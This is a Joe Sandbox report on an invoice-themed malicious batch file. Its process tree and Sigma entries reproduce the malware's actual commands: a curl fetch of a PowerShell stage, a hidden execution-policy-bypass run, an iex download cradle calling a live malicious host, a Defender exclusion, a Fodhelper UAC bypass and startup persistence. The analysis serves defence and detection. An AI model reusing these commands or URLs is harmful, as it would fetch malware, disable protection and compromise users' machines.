Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura-2410-CFDI.bat

Overview

General Information

Sample name:Factura-2410-CFDI.bat
Analysis ID:1542952
MD5:2cba1f2ecba7411565c62f74f8ff095c
SHA1:e69a4fccd578e235fa31c3edc9d8b4a6974faeb0
SHA256:1a17e8bd86fbe8d1fb1aedce6182de434a3a8e71488f6d285651c168d03242eb
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Powershell download and execute
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses shutdown.exe to shutdown or reboot the system
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 620 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • curl.exe (PID: 6132 cmdline: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • powershell.exe (PID: 6872 cmdline: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • _kjfech8_Vi7.exe (PID: 1492 cmdline: "C:\_kjfech8_V\_kjfech8_Vi7.exe" MD5: 4AFCAB972E98ECBF855F915B2739F508)
        • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 4484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • WerFault.exe (PID: 7488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • shutdown.exe (PID: 4876 cmdline: "C:\Windows\system32\shutdown.exe" /r /t 10 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
    • powershell.exe (PID: 8092 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 1688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6500 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7380 cmdline: powershell.exe -nop -win 1 - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • _kjfech8_Vi7.exe (PID: 3204 cmdline: "C:\_kjfech8_V\_kjfech8_Vi7.exe" MD5: 4AFCAB972E98ECBF855F915B2739F508)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Documents\vs1.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: curl.exe PID: 6132JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6872JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6872INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf22f:$b1: ::WriteAllBytes(
        • 0xaa2c:$b2: ::FromBase64String(
        • 0xad97:$b2: ::FromBase64String(
        • 0xaeab:$b2: ::FromBase64String(
        • 0xaf1c:$b2: ::FromBase64String(
        • 0xaf7a:$b2: ::FromBase64String(
        • 0xaff9:$b2: ::FromBase64String(
        • 0xb06b:$b2: ::FromBase64String(
        • 0xb22b:$b2: ::FromBase64String(
        • 0xb28e:$b2: ::FromBase64String(
        • 0xb357:$b2: ::FromBase64String(
        • 0xb3db:$b2: ::FromBase64String(
        • 0xb467:$b2: ::FromBase64String(
        • 0xb4f1:$b2: ::FromBase64String(
        • 0xb598:$b2: ::FromBase64String(
        • 0xb62e:$b2: ::FromBase64String(
        • 0xb6a0:$b2: ::FromBase64String(
        • 0xb785:$b2: ::FromBase64String(
        • 0xb8c1:$b2: ::FromBase64String(
        • 0xb93e:$b2: ::FromBase64String(
        • 0xb9a9:$b2: ::FromBase64String(

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_6872.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_6872.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x6715:$b1: ::WriteAllBytes(
          • 0x3a4:$b2: ::FromBase64String(
          • 0x9d1:$b2: ::FromBase64String(
          • 0xd0e:$b2: ::FromBase64String(
          • 0xd80:$b2: ::FromBase64String(
          • 0xddf:$b2: ::FromBase64String(
          • 0xe5f:$b2: ::FromBase64String(
          • 0xed2:$b2: ::FromBase64String(
          • 0x1093:$b2: ::FromBase64String(
          • 0x10f7:$b2: ::FromBase64String(
          • 0x11c2:$b2: ::FromBase64String(
          • 0x1247:$b2: ::FromBase64String(
          • 0x12d4:$b2: ::FromBase64String(
          • 0x135f:$b2: ::FromBase64String(
          • 0x1407:$b2: ::FromBase64String(
          • 0x149e:$b2: ::FromBase64String(
          • 0x1511:$b2: ::FromBase64String(
          • 0x15f7:$b2: ::FromBase64String(
          • 0x1734:$b2: ::FromBase64String(
          • 0x17b2:$b2: ::FromBase64String(
          • 0x181e:$b2: ::FromBase64String(
          amsi64_7380.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7380.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xefd3:$b1: ::WriteAllBytes(
            • 0x8c5e:$b2: ::FromBase64String(
            • 0x928f:$b2: ::FromBase64String(
            • 0x95cc:$b2: ::FromBase64String(
            • 0x963e:$b2: ::FromBase64String(
            • 0x969d:$b2: ::FromBase64String(
            • 0x971d:$b2: ::FromBase64String(
            • 0x9790:$b2: ::FromBase64String(
            • 0x9951:$b2: ::FromBase64String(
            • 0x99b5:$b2: ::FromBase64String(
            • 0x9a80:$b2: ::FromBase64String(
            • 0x9b05:$b2: ::FromBase64String(
            • 0x9b92:$b2: ::FromBase64String(
            • 0x9c1d:$b2: ::FromBase64String(
            • 0x9cc5:$b2: ::FromBase64String(
            • 0x9d5c:$b2: ::FromBase64String(
            • 0x9dcf:$b2: ::FromBase64String(
            • 0x9eb5:$b2: ::FromBase64String(
            • 0x9ff2:$b2: ::FromBase64String(
            • 0xa070:$b2: ::FromBase64String(
            • 0xa0dc:$b2: ::FromBase64String(

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution of Powershell Script in Public Folder
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
            Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
            Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Sigma detected: PowerShell Download and Execution Cradles
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\_kjfech8_V\_kjfech8_Vi7.exe" , ParentImage: C:\_kjfech8_V\_kjfech8_Vi7.exe, ParentProcessId: 1492, ParentProcessName: _kjfech8_Vi7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", ProcessId: 6104, ProcessName: powershell.exe
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Sigma detected: Suspicious PowerShell Download and Execute Pattern
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\users\public\computer_kjfech8_V.cmd
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\users\public\computer_kjfech8_V.cmd
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\_kjfech8_V\_kjfech8_Vi7.exe" , ParentImage: C:\_kjfech8_V\_kjfech8_Vi7.exe, ParentProcessId: 1492, ParentProcessName: _kjfech8_Vi7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", ProcessId: 6104, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
            Sigma detected: Suspicious Execution of Shutdown
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\shutdown.exe" /r /t 10, CommandLine: "C:\Windows\system32\shutdown.exe" /r /t 10, CommandLine|base64offset|contains: , Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\shutdown.exe" /r /t 10, ProcessId: 4876, ProcessName: shutdown.exe
            Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , CommandLine: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , ProcessId: 6132, ProcessName: curl.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Sigma detected: Powershell Download and Execute IEX
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T00:21:58.065441+020020526421A Network Trojan was detected93.127.200.211443192.168.11.2049752TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T00:21:58.065441+020028347171A Network Trojan was detected93.127.200.211443192.168.11.2049752TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T00:21:47.576164+020028417171Malware Command and Control Activity Detected192.168.11.204975062.72.3.21080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\Public\computer_kjfech8_V.cmdAvira: detection malicious, Label: BAT/Runner.VPF
            Source: C:\Users\Public\computer_kjfech8_Vy.cmdAvira: detection malicious, Label: BAT/Runner.VPF
            Source: C:\Users\Public\Documents\vs1.ps1Avira: detection malicious, Label: TR/PShell.Dldr.VPJ
            Multi AV Scanner detection for dropped file
            Source: C:\_kjfech8_V\jli.dllReversingLabs: Detection: 18%

            Privilege Escalation

            barindex
            UAC bypass detected (Fodhelper)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: DelegateExecute Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: NULL C:\_kjfech8_V\_kjfech8_Vi7.exeJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeFile opened: C:\_kjfech8_V\MSVCR100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2
            Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
